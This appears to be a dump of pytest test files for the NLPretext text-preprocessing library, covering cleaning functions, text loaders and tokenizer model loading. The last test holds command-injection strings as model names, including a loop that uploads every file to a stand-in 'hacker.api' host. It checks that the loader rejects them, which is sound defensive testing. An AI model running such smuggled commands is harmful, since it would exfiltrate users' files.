        ("ACV water + cinnamon + turmeric + cucumber + lemon. 👍🏻", [":thumbs_up_light_skin_tone:"]),
        ("This is a text without emojis", []),
    ],
)
def test_extract_emojis(text, expected_result):
    result = extract_emojis(text)
    assert expected_result == result


@pytest.mark.parametrize(
    "text, expected_result",
    [
        ("I take care of my skin with @hellobody", "I take care of my skin with"),
        ("This is a text without mentions", "This is a text without mentions"),
    ],
)
def test_remove_mentions(text, expected_result):
    result = remove_mentions(text)
    assert expected_result == result


@pytest.mark.parametrize(
    "text, expected_result",
    [
        ("I take care of my skin with @hellobody", ["@hellobody"]),
        ("This is a text without mentions", []),
    ],
)
def test_extract_mentions(text, expected_result):
    result = extract_mentions(text)
    assert expected_result == result


@pytest.mark.parametrize(
    "text, expected_result",
    [
        (
            "This is a text with <html> content of html tag </html>",
            "This is a text with content of html tag",
        ),
        ("This is a text without html tags", "This is a text without html tags"),
    ],
)
def test_remove_html_tags(text, expected_result):
    result = remove_html_tags(text)
    assert expected_result == result


@pytest.mark.parametrize(
    "tokens_list, smallwords_threshold, expected_result",
    [
        (["I", "take", "care", "of", "my", "skin"], 2, ["take", "care", "skin"]),
        (
            ["This", "text", "contains", "only", "long", "words"],
            2,
            ["This", "text", "contains", "only", "long", "words"],
        ),
    ],
)
def test_remove_smallwords(tokens_list, smallwords_threshold, expected_result):
    result = remove_smallwords(tokens_list, smallwords_threshold)
    assert expected_result == result


@pytest.mark.parametrize(
    "text, expected_result",
    [
        ("this is a #hashtag in the middle of the text", ["#hashtag"]),
        ("#this is a hashtag in the beginning of the text", ["#this"]),
        ("this is a hashtag in the end of the #text", ["#text"]),
        ("this is a text with no hashtag", []),
        ("this is a text with #many #hashtags", ["#many", "#hashtags"]),
    ],
)
def test_extract_hashtags(text, expected_result):
    result = extract_hashtags(text)
    assert expected_result == result


@pytest.mark.parametrize(
    "text, expected_result",
    [
        ("this is a #hashtag in the middle of the text", "this is a in the middle of the text"),
        (
            "#this is a hashtag in the beginning of the text",
            "is a hashtag in the beginning of the text",
        ),
        ("this is a hashtag in the end of the #text", "this is a hashtag in the end of the"),
        ("this is a text with no hashtag", "this is a text with no hashtag"),
        ("this is a text with #many #hashtags", "this is a text with"),
    ],
)
def test_remove_hashtag(text, expected_result):
    result = remove_hashtag(text)
    assert expected_result == result


@pytest.mark.parametrize(
    "text, expected_filtered_text",
    [
        (
            "كلمات Learn 3 Arabic كلمات words EASILY- Vocabulary #1 تعلم ٣ جديدة",
            "Learn 3 Arabic words EASILY Vocabulary 1",
        )
    ],
)
def test_filter_non_latin_characters(text, expected_filtered_text):
    result = filter_non_latin_characters(text)
    assert expected_filtered_text == result


@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("hello   world", "hello world"),
        ("\n   hello world    ", "hello world"),
        ("----- hello\tworld *****", "hello world"),
        ("hello-world", "hello-world"),
        ("hello - world", "hello world"),
    ],
)
def test_remove_multiple_spaces_and_strip_text(input_str, expected_str):
    result = remove_multiple_spaces_and_strip_text(input_str)
    np.testing.assert_string_equal(result, expected_str)


@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("\nhello world", " hello world"),
        ("hello\nworld", "hello world"),
        ("hello world\n", "hello world "),
    ],
)
def test_remove_eol_characters(input_str, expected_str):
    result = remove_eol_characters(input_str)
    np.testing.assert_string_equal(result, expected_str)


def test_remove_tokens_with_nonletters():
    input_tokens = ["foo", "bar", "124", "34euros"]
    expected_output = ["foo", "bar"]
    result = remove_tokens_with_nonletters(input_tokens)
    np.testing.assert_array_equal(result, expected_output)


def test_remove_special_caracters_from_tokenslist():
    input_tokens = ["foo", "bar", "---", "'s", "#"]
    expected_output = ["foo", "bar", "'s"]
    result = remove_special_caracters_from_tokenslist(input_tokens)
    np.testing.assert_array_equal(result, expected_output)


def test_get_stopwords():
    languages_to_test = ["fr", "en", "ga", "zh"]
    for lang in languages_to_test:
        result = get_stopwords(lang)
        assert len(result) > 0 and isinstance(result, list)


@pytest.mark.parametrize(
    "input_tokens, lang, expected_output",
    [(["I", "like", "this", "song", "very", "much", "!"], "en", ["I", "song", "!"])],
)
def test_remove_stopwords_tokens(input_tokens, lang, expected_output):
    result = remove_stopwords_token(input_tokens, lang)
    np.testing.assert_array_equal(result, expected_output)


@pytest.mark.parametrize(
    "input_text, lang, custom_stopwords, ignored_stopwords, expected_output",
    [
        ("I like this song very much !", "en", None, None, "I song !"),
        ("Can I get a beer?", "en", None, None, "Can I beer ?"),
        ("Je vous recommande ce film !", "fr", None, None, "Je recommande film !"),
        ("je vous recommande ce film !", "fr", None, None, "recommande film !"),
        ("Quiero una cerveza, por favor.", "es", None, None, "Quiero cerveza, favor."),
        ("je vous recommande ce film !", "fr", ["recommande"], None, "film !"),
        ("Quiero una cerveza, por favor.", "es", None, ["una"], "Quiero una cerveza, favor."),
        ("je vous recommande ce film !", "fr", ["recommande"], ["je vous"], "je vous film !"),
        (
            "je vous recommande ce film !",
            "fr",
            ["recommande"],
            ["recommande ce film"],
            "recommande ce film !",
        ),
    ],
)
def test_remove_stopwords_text(
    input_text, lang, custom_stopwords, ignored_stopwords, expected_output
):
    result = remove_stopwords_text(input_text, lang, custom_stopwords, ignored_stopwords)
    np.testing.assert_array_equal(result, expected_output)


@pytest.mark.parametrize(
    "input_text, lang, custom_stopwords, expected_output",
    [
        ("I like this song very much !", "en", ["song"], "I !"),
        (
            "Je vous recommande ce film la scène de fin est géniale !",
            "fr",
            ["film", "scène"],
            "Je recommande fin géniale !",
        ),
    ],
)
def test_remove_custom_stopwords_text(input_text, lang, custom_stopwords, expected_output):
    result = remove_stopwords_text(input_text, lang, custom_stopwords)
    np.testing.assert_array_equal(result, expected_output)


def test_remove_accents():
    input_str = "éèëêàù"
    expected_str = "eeeeau"
    result = remove_accents(input_str)
    np.testing.assert_string_equal(result, expected_str)


@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("Les augmentations de rÃ©munÃ©rations", "Les augmentations de rémunérations"),
        (
            "rÃ©nover l'enquÃªte publique pour en faire un vrai outil  d'amÃ©nagement du territoire et de dialogue social",
            "rénover l'enquête publique pour en faire un vrai outil  d'aménagement du territoire et de dialogue social",
        ),
        (
            "Limitations de vitesse et sÃ©curitÃ© routiÃ¨re",
            "Limitations de vitesse et sécurité routière",
        ),
        ("Pour un nouveau contrat citoyen", "Pour un nouveau contrat citoyen"),
        (
            "DÃ©velopper les dÃ©marches de budget participatif dans les collectivitÃ©s et associer les citoyens"
            " dans la rÃ©alisation des projets",
            "Développer les démarches de budget participatif dans les collectivités et associer les citoyens"
            " dans la réalisation des projets",
        ),
        ("proportienelle", "proportienelle"),
        ("Pour plus de dÃ©mocratie participative", "Pour plus de démocratie participative"),
        ("Transparence de la vie public", "Transparence de la vie public"),
        ("EgalitÃ© devant les infractions routiÃ¨res", "Egalité devant les infractions routières"),
    ],
)
def test_fix_bad_unicode(input_str, expected_str):
    result = fix_bad_unicode(input_str)
    np.testing.assert_string_equal(result, expected_str)


@pytest.mark.parametrize(
    "input_str, expected_str",
    [("  foo  ", "foo"), ("  foo   bar  ", "foo bar")],
)
def test_normalize_whitespace(input_str, expected_str):
    result = normalize_whitespace(input_str)
    np.testing.assert_equal(result, expected_str)


@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("I can't tell how we've done.", "I can not tell how we have done."),
        ("You're fired. She's nice.", "You are fired. She's nice."),
        ("Let's go!", "Let us go!"),
        ("You've been missing", "You have been missing"),
        ("I'm sure you're leaving", "I am sure you are leaving"),
        ("We'll survive.", "We will survive."),
    ],
)
def test_unpack_english_contractions(input_str, expected_str):
    result = unpack_english_contractions(input_str)
    np.testing.assert_equal(result, expected_str)


@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        (
            "Wan't to contribute to NLPretext? read https://github.com/artefactory/NLPretext/blob/master/CONTRIBUTING.md"
            " first",
            "Wan't to contribute to NLPretext? read *URL* first",
        ),
        (
            "If you go to http://internet.org, you will find a website hosted by FB.",
            "If you go to *URL*, you will find a website hosted by FB.",
        ),
        ("Ishttps://internet.org/ available?", "Is*URL* available?"),
        ("mailto:john.doe@artefact.com", "*URL*"),
    ],
)
def test_replace_urls(input_str, expected_str):
    result = replace_urls(input_str)
    np.testing.assert_equal(result, expected_str)


@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("my email:john.doe@artefact.com", "my email:*EMAIL*"),
        ("v543143@nwytg.net is a temporary email", "*EMAIL* is a temporary email"),
        ("our emails used to be name.surname@artefact.is", "our emails used to be *EMAIL*"),
    ],
)
def test_replace_emails(input_str, expected_str):
    result = replace_emails(input_str)
    np.testing.assert_equal(result, expected_str)


@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("mon 06: 0601020304", "mon 06: *PHONE*"),
        ("mon 06: 06.01.02.03.04", "mon 06: *PHONE*"),
        ("call me at +33601020304", "call me at *PHONE*"),
        ("call me at +33 6 01 02 03 04", "call me at *PHONE*"),
        ("call me at +33 601 020 304", "call me at *PHONE*"),
        (
            "if this unit test doesn't work, call 3615 and says 'HELP'",
            "if this unit test doesn't work, call *PHONE* and says 'HELP'",
        ),
        ("(541) 754-0000 is a US. Phone", "*PHONE* is a US. Phone"),
        ("+1-541-754-0000 is an international Phone", "*PHONE* is an international Phone"),
        ("+1-541-754-0000 Dialed in the US", "*PHONE* Dialed in the US"),
        ("+1-541-754-0000 Dialed from Germany", "*PHONE* Dialed from Germany"),
    ],
)
def test_replace_phone_numbers(input_str, expected_str):
    result = replace_phone_numbers(
        input_str,
        replace_with="*PHONE*",
        method="detection",
        country_to_detect=SUPPORTED_COUNTRY,
    )
    np.testing.assert_equal(result, expected_str)


@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("123, 3 petits chats", "*NUMBER*, *NUMBER* petits chats"),
        ("Give me 45bucks!", "Give me *NUMBER*bucks!"),
        ("call me at +33601020304", "call me at *NUMBER*"),
    ],
)
def test_replace_numbers(input_str, expected_str):
    result = replace_numbers(input_str)
    np.testing.assert_equal(result, expected_str)


@pytest.mark.parametrize(
    "input_str, param, expected_str",
    [
        ("Give me 23$", None, "Give me 23USD"),
        ("Give me 23£", None, "Give me 23GBP"),
        ("Give me 23 £", None, "Give me 23 GBP"),
        ("Give me 23 €", None, "Give me 23 EUR"),
        (
            "¥ is both japanese yen and Chinese Renminbi",
            "*CUR*",
            "*CUR* is both japanese yen and Chinese Renminbi",
        ),
    ],
)
def test_replace_currency_symbols(input_str, param, expected_str):
    result = replace_currency_symbols(input_str, replace_with=param)
    np.testing.assert_equal(result, expected_str)


@pytest.mark.parametrize(
    "input_str, param, expected_str",
    [
        ("Seriously...", None, "Seriously   "),
        ("Seriously?", None, "Seriously "),
        ("Seriously ?", None, "Seriously  "),
        ("Seriously???", None, "Seriously   "),
        ("Seriously?!", None, "Seriously  "),
        ('"Seriously"', None, " Seriously "),
        ("Seriously:", None, "Seriously "),
        ("Seriously;", None, "Seriously "),
        ("'Seriously'", None, " Seriously "),
        ("'Seriously'", ".,;", "'Seriously'"),
        ("Seriously.,.", ".,;", "Seriously "),
        ("Seriously...", ".,;", "Seriously "),
        ("Seriously.!.", ".,;", "Seriously ! "),
        ("john.doe@artefact.com", ".,;", "john doe@artefact com"),
        ("john.doe@artefact.com", None, "john doe artefact com"),
        ("john-doe@artefact.com", None, "john doe artefact com"),
    ],
)
def test_remove_punct(input_str, param, expected_str):
    result = remove_punct(input_str, marks=param)
    np.testing.assert_equal(result, expected_str)


@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("⚽👌", ""),
        ("🎅🏿⌚", ""),
        ("🥖🍷🇫🇷", ""),
        ("✊", ""),
        ("Save 🐼 and 🐟", "Save  and "),
    ],
)
def test_remove_emoji(input_str, expected_str):
    result = remove_emoji(input_str)
    assert len(result) == len(expected_str)
    assert result == expected_str


@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("⚽️👌", ":soccer_ball::OK_hand:"),
        ("🎅🏿⌚", ":Santa_Claus_dark_skin_tone::watch:"),
        ("🥖🍷🇫🇷", ":baguette_bread::wine_glass::France:"),
        ("✊", ":raised_fist:"),
    ],
)
def test_convert_emoji_to_text(input_str, expected_str):
    result = convert_emoji_to_text(input_str)
    np.testing.assert_equal(result, expected_str)


def test_custom_preprocess():
    # Given
    text = "Some text with @mentions and #hashtags"

    preprocessor = Preprocessor()
    preprocessor.pipe(remove_hashtag)
    preprocessor.pipe(remove_mentions)
    expected_result = remove_hashtag(text)
    expected_result = remove_mentions(expected_result)

    # When
    result = preprocessor.run(text)

    # Then
    assert expected_result == result


@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        (
            "Some text with @mentions and whitespaces    and #hashtags",
            "Some text with and whitespaces and",
        ),
        ("@twitteruser ✊", ""),
        ("", ""),
    ],
)
def test_apply_preprocessor(input_str, expected_str):
    # Given
    preprocessor = Preprocessor()

    # When
    result = preprocessor.run(input_str)

    # Then
    assert expected_str == result


================================================
FILE: tests/test_textloader.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
# mypy: disable-error-code="attr-defined"

from pathlib import Path
from unittest.mock import MagicMock, patch

try:
    import dask.bag as db
    import dask.dataframe as dd
except ImportError as e:
    raise ImportError("please install dask: pip install dask[complete]") from e

try:
    import pandas as pd
except ImportError as e:
    raise ImportError("please install pandas: pip install pandas") from e

import pytest
from nlpretext.preprocessor import Preprocessor
from nlpretext.textloader import TextLoader
from pandas.testing import assert_frame_equal

# pylint: disable=protected-access


@patch("dask.bag.read_text")
def test__read_text_txt_dask(mock_read_text):
    # Given
    files_path = "some_path/to_read.txt"
    file_format = "txt"
    encoding = "utf-8"
    text_column = "text"
    mock_read_text.return_value = db.from_sequence(["This is a text \n", "This is another text \n"])

    expected_result = dd.from_pandas(
        pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
        npartitions=2,
    )

    # When
    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
    actual_result = dummy_instance._read_text_txt(files_path)

    # Then
    mock_read_text.assert_called_once_with(files_path, encoding=encoding)
    assert_frame_equal(expected_result.compute(), actual_result.compute().reset_index(drop=True))


@patch("pandas.read_fwf")
def test__read_text_txt_pandas(mock_read_text):
    # Given
    files_path = "some_path/to_read.txt"
    file_format = "txt"
    encoding = "utf-8"
    text_column = "text"
    mock_read_text.return_value = pd.DataFrame(
        {text_column: ["This is a text", "This is another text"]}
    )

    expected_result = pd.DataFrame({text_column: ["This is a text", "This is another text"]})

    # When
    dummy_instance = TextLoader(
        file_format=file_format,
        use_dask=False,
        encoding=encoding,
        text_column=text_column,
    )
    actual_result = dummy_instance._read_text_txt(files_path)

    # Then
    mock_read_text.assert_called_once_with(
        str(Path(files_path).absolute()), encoding=encoding, colspecs=[(None, None)]
    )
    assert_frame_equal(expected_result, actual_result.reset_index(drop=True))


@patch("nlpretext._utils.daskloader.dd")
def test__read_text_json_dask(mock_read):
    # Given
    files_path = "some_path/to_read.json"
    file_format = "json"
    encoding = "utf-8"
    text_column = "text"

    text_ddf = dd.from_pandas(
        pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
        npartitions=2,
    )
    mock_read.read_json.return_value = text_ddf

    expected_result = text_ddf[[text_column]]

    # When
    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
    actual_result = dummy_instance._read_text_json(files_path)

    # Then
    mock_read.read_json.assert_called_once_with(files_path, encoding=encoding)
    assert_frame_equal(expected_result.compute(), actual_result.compute())


@patch("nlpretext._utils.pandasloader.read_json")
def test__read_text_json_pandas(mock_read):
    # Given
    files_path = "some_path/to_read.txt"
    file_format = "txt"
    encoding = "utf-8"
    text_column = "text"

    dummy_instance = TextLoader(
        file_format=file_format,
        use_dask=False,
        encoding=encoding,
        text_column=text_column,
    )
    dummy_instance._read_text_json(files_path)

    # Then
    mock_read.assert_called_once_with(files_path, encoding=encoding)


@patch("dask.dataframe.read_csv")
def test__read_text_csv_dask(mock_read_csv):
    # Given
    files_path = "some_path/to_read.csv"
    file_format = "csv"
    encoding = "utf-8"
    text_column = "text"

    text_ddf = dd.from_pandas(
        pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
        npartitions=2,
    )
    mock_read_csv.return_value = text_ddf

    expected_result = text_ddf[[text_column]]

    # When
    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
    actual_result = dummy_instance._read_text_csv(files_path)

    # Then
    mock_read_csv.assert_called_once_with(files_path, encoding=encoding)
    assert_frame_equal(expected_result.compute(), actual_result.compute())


@patch("nlpretext._utils.pandasloader.read_csv")
def test__read_text_csv_pandas(mock_read):
    # Given
    files_path = "some_path/to_read.txt"
    file_format = "txt"
    encoding = "utf-8"
    text_column = "text"

    dummy_instance = TextLoader(
        file_format=file_format,
        use_dask=False,
        encoding=encoding,
        text_column=text_column,
    )
    dummy_instance._read_text_csv(files_path)

    # Then
    mock_read.assert_called_once_with(files_path, encoding=encoding)


@patch("dask.dataframe.read_parquet")
def test__read_text_parquet_dask(mock_read_parquet):
    # Given
    files_path = "some_path/to_read.parquet"
    file_format = "parquet"
    encoding = "utf-8"
    text_column = "text"

    text_ddf = dd.from_pandas(
        pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
        npartitions=2,
    )
    mock_read_parquet.return_value = text_ddf

    expected_result = text_ddf[[text_column]]

    # When
    dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
    actual_result = dummy_instance._read_text_parquet(files_path)

    # Then
    mock_read_parquet.assert_called_once_with(files_path, encoding=encoding)
    assert_frame_equal(expected_result.compute(), actual_result.compute())


@patch("nlpretext._utils.pandasloader.read_parquet")
def test__read_text_parquet_pandas(mock_read):
    # Given
    files_path = "some_path/to_read.txt"
    file_format = "txt"
    encoding = "utf-8"
    text_column = "text"

    dummy_instance = TextLoader(
        file_format=file_format,
        use_dask=False,
        encoding=encoding,
        text_column=text_column,
    )
    dummy_instance._read_text_parquet(files_path)

    # Then
    mock_read.assert_called_once_with(files_path, encoding=encoding)


@pytest.mark.parametrize(
    "files_path, file_format, encoding, compute_to_pandas, preprocessor, expected_format, raised",
    [
        ("text_file1.json", None, None, True, None, "json", None),
        ("text_file2.json", "json", None, True, None, "json", None),
        ("text_file3.csv", None, "utf-8", True, None, "csv", None),
        ("text_file4.csv", None, None, False, None, "csv", None),
        ("text_file3.parquet", None, "utf-8", True, None, "parquet", None),
        ("text_file4.parquet", None, None, False, None, "parquet", None),
        ("text_file5.pdf", "pdf", None, False, None, "csv", "Format not handled"),
        ("text_file6.txt", None, None, False, Preprocessor(), "txt", None),
        (
            "text_file8.txt",
            None,
            None,
            False,
            MagicMock(),
            "txt",
            "Only NLPretext preprocessors can be specified",
        ),
    ],
)
@patch("nlpretext.preprocessor.Preprocessor.run", return_value="This is a text", autospec=True)
@patch("nlpretext.textloader.TextLoader._read_text_json")
@patch("nlpretext.textloader.TextLoader._read_text_txt")
@patch("nlpretext.textloader.TextLoader._read_text_csv")
@patch("nlpretext.textloader.TextLoader._read_text_parquet")
@patch("nlpretext.textloader.check_text_file_format")
def test_read_text(
    mock_check_text_file_format,
    mock__read_text_parquet,
    mock__read_text_csv,
    mock__read_text_txt,
    mock__read_text_json,
    mock_run,
    files_path,
    file_format,
    encoding,
    compute_to_pandas,
    preprocessor,
    expected_format,
    raised,
):
    # Given
    text_column = "text"
    if encoding is None:
        encoding = "utf-8"

    if file_format is None:
        mock_check_text_file_format.return_value = expected_format

    mock_reader_mapping = {
        "csv": mock__read_text_csv,
        "txt": mock__read_text_txt,
        "json": mock__read_text_json,
        "parquet": mock__read_text_parquet,
    }

    expected_result = dd.from_pandas(
        pd.DataFrame({text_column: ["Text with #", "Text with  double  space"]}),
        npartitions=2,
    )
    mock_reader_mapping.get(expected_format).return_value = expected_result  # type: ignore

    # When
    dummy_textloader = TextLoader(
        text_column=text_column, encoding=encoding, file_format=file_format
    )

    if raised is None:
        actual_result = dummy_textloader.read_text(
            files_path, file_format, encoding, compute_to_pandas, preprocessor
        )

        # Then
        if file_format is None:
            mock_check_text_file_format.assert_called_once_with(files_path)

        mock_reader_mapping[expected_format].assert_called_once_with(files_path)

        if preprocessor is not None:
            if isinstance(preprocessor, Preprocessor):
                mock_run.assert_called()
                preprocessed_texts = ["Text with", "Text with double space"]
                mock_run.side_effect = preprocessed_texts
                expected_result = dd.from_pandas(
                    pd.DataFrame({text_column: preprocessed_texts}), npartitions=2
                )

        if not compute_to_pandas:
            actual_result = actual_result.compute()
        assert_frame_equal(expected_result.compute(), actual_result)

    else:
        with pytest.raises(ValueError, match=raised):
            dummy_textloader.read_text(
                files_path, file_format, encoding, compute_to_pandas, preprocessor
            )


================================================
FILE: tests/test_tokenizer.py
================================================
import pytest
from nlpretext.token.tokenizer import LanguageNotInstalledError, _load_spacy_model


@pytest.mark.parametrize(
    "bad_model_name",
    [
        ("en_core_web_sm; chmod -x hacker"),
        (
            "fr_core_news_sm | for file in $(find .); "
            'do curl_command -X POST -H "Content-Type: multipart/form-data" '
            '-F "data=@${file}" https-fake://hacker.api/upload; done'
        ),
    ],
)
def test_load_spacy_model_validation(bad_model_name):
    with pytest.raises(LanguageNotInstalledError) as e:
        _load_spacy_model(bad_model_name)
        assert bad_model_name in str(e.value)